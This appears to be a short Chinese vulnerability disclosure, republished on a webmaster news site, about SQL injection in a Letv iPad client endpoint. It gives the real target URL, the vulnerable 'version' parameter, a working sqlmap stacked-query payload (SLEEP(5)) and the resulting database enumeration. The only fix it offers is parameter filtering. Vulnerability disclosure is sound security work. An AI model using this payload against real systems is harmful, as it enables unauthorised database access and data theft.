乐视网IPAD客户端SQL注射一枚下载

http://dynamic.app.m.letv.com:80/android/dynamic.php?mod=audit&ctl=audit&act=indexv1&pcode=010510000&version=5.0





 

---

Place: GET

Parameter: version

    Type: stacked queries

    Title: MySQL > 5.0.11 stacked queries

    Payload: mod=audit&ctl=audit&act=indexv1&pcode=010510000&version=5.0'; SELEC

T SLEEP(5)--

---





version参数存在注入



 

web application technology: Nginx, PHP 5.4.4

back-end DBMS: MySQL 5.0.11



available databases [2]:

[*] information_schema

[*] mclient



跑表速度太慢了...就不跑了

mclient库有148个表

修复方案:

过滤相关参数!

上一篇: 站长之家(chinaz.com)分站一枚SQL注入洞下载
下一篇: 住哪网SQL注射可造成531万用户信息泄漏下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细